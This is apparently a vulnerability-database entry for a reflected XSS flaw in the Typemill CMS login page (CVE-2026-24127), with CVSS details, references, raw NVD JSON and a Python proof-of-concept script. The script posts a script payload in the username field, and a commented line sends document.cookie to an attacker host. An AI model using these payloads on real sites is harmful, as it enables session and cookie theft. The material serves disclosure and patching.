CVE-2026-24127

Description

Typemill is a flat-file, Markdown-based CMS designed for informational documentation websites. A reflected Cross-Site Scripting (XSS) exists in the login error view template `login.twig` of versions 2.19.1 and below. The `username` value can be echoed back without proper contextual encoding when authentication fails. An attacker can execute script in the login page context. This issue has been fixed in version 2.19.2.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:typemill:typemill:*:*:*:*:*:*:*:* - VULNERABLE

Typemill CMS <= 2.19.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2026-24127 PoC - Typemill CMS Reflected XSS
# Target: Typemill CMS login page
# Vulnerability: Unsanitized username parameter in login.twig template

def exploit_xss(target_url, payload):
    """
    Exploit the reflected XSS vulnerability in Typemill CMS login page.
    
    Args:
        target_url: Base URL of the Typemill CMS installation
        payload: Malicious JavaScript payload to inject
    
    Returns:
        Response from the server
    """
    # Login endpoint
    login_url = f"{target_url}/login"
    
    # Prepare malicious username with XSS payload
    data = {
        'authcode': 'test',  # Invalid authcode to trigger error
        'username': payload,  # XSS payload injected here
        'password': 'test'
    }
    
    # Send request with malicious username
    response = requests.post(login_url, data=data, allow_redirects=False)
    
    return response

# Example usage
if __name__ == "__main__":
    target = "http://vulnerable-server.com"
    
    # Basic XSS payload to steal cookies
    xss_payload = "<script>alert(document.cookie)</script>"
    
    # More advanced payload for cookie stealing
    # xss_payload = "<img src=x onerror='fetch(\"https://attacker.com/log?c=\"+document.cookie)'/>"
    
    print(f"[*] Targeting: {target}")
    print(f"[*] Payload: {xss_payload}")
    
    response = exploit_xss(target, xss_payload)
    
    print(f"[*] Response Status: {response.status_code}")
    print(f"[*] XSS payload sent. Victim will execute script on page visit.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-24127
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-24127
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-24127/
[4] VulDB https://vuldb.com/cve/CVE-2026-24127
[5] https://github.com/typemill/typemill/commit/b506acd11e80fb9c8db5fa6c2c8ad73580b4e88c
[6] https://github.com/typemill/typemill/releases/tag/v2.19.2
[7] https://github.com/typemill/typemill/security/advisories/GHSA-65x4-pjhj-r8wr

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-24127", "sourceIdentifier": "[email protected]", "published": "2026-01-23T23:15:54.360", "lastModified": "2026-02-02T13:32:53.560", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Typemill is a flat-file, Markdown-based CMS designed for informational documentation websites. A reflected Cross-Site Scripting (XSS) exists in the login error view template `login.twig` of versions 2.19.1 and below. The `username` value can be echoed back without proper contextual encoding when authentication fails. An attacker can execute script in the login page context. This issue has been fixed in version 2.19.2."}, {"lang": "es", "value": "Typemill es un CMS de archivo plano, basado en Markdown, diseñado para sitios web de documentación informativa. Un Cross-Site Scripting (XSS) reflejado existe en la plantilla de vista de error de inicio de sesión 'login.twig' de las versiones 2.19.1 e inferiores. El valor 'username' puede ser devuelto sin la codificación contextual adecuada cuando la autenticación falla. Un atacante puede ejecutar scripts en el contexto de la página de inicio de sesión. Este problema ha sido solucionado en la versión 2.19.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-116"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:typemill:typemill:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.19.2", "matchCriteriaId": "4E3CADA3-5037-4F37-9488-CE162A458090"}]}]}], "references": [{"url": "https://github.com/typemill/typemill/commit/b506acd11e80fb9c8db5fa6c2c8ad73580b4e88c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/typemill/typemill/releases/tag/v2.19.2", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/typemill/typemill/security/advisories/GHSA-65x4-pjhj-r8wr", "source": "[email protected]", "tags": ["Third Party Advisory", "Exploit"]}]}}